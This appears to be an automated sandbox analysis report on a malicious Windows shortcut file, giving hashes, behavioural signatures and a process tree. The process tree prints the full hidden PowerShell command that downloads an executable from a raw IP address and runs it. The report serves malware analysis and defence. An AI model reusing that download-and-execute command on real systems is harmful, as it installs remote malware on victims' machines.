Analysis
  max time kernel: 121s
  max time network: 121s
  platform: windows7_x64
  resource: win7-20240903-en
  resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  submitted: 31-12-2024 08:32
Static task: static1

Behavioral task: behavioral1
  Sample: 009274965.lnk
  Resource: win7-20240903-en (windows7-x64)
  5 signatures, 150 seconds

Behavioral task: behavioral2
  Sample: 009274965.lnk
  Resource: win10v2004-20241007-en (windows10-2004-x64)
  14 signatures, 150 seconds
General
  Target: 009274965.lnk
  Size: 2KB
  MD5: 7f070dfbaa6893bb2effac0f2320a1d7
  SHA1: 293e7f6f6e70a0c7699215b3402dc5ff2bb2bfaa
  SHA256: aeed70a3f936b699e93f18dfc5b4a582a6a08be7d52d8e6229754f96205aecb2
  SHA512: 720b2a90dd051160aeaa1a11a70433213b96f04e8d160c55c699f4fd6af7f1c07db61e110e684d9ce91ad79e987bd809497eb2d52ac2f3bd96cdb289c443b883
  Score: 8/10
Malware Config
Signatures

  Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
    Run Powershell and hide display window.
    pid    Process
    2700   powershell.exe
    2700   powershell.exe

  Enumerates physical storage devices (1 TTPs)
    Attempts to interact with connected storage/optical drive(s).

  Suspicious behavior: EnumeratesProcesses (1 IoCs)
    pid    Process
    2700   powershell.exe

  Suspicious use of AdjustPrivilegeToken (1 IoCs)
    description               pid    Process
    Token: SeDebugPrivilege   2700   powershell.exe

  Suspicious use of WriteProcessMemory (3 IoCs)
    description                        pid    Process    procid_target
    PID 2616 wrote to memory of 2700   2616   cmd.exe    31
    PID 2616 wrote to memory of 2700   2616   cmd.exe    31
    PID 2616 wrote to memory of 2700   2616   cmd.exe    31
Processes

  1. C:\Windows\system32\cmd.exe
     Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\009274965.lnk
     PID: 2616
     Signatures: Suspicious use of WriteProcessMemory

     2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of 1)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\Admin\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\Admin\AppData\Local\Temp\file.exe' }"
        PID: 2700
        Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken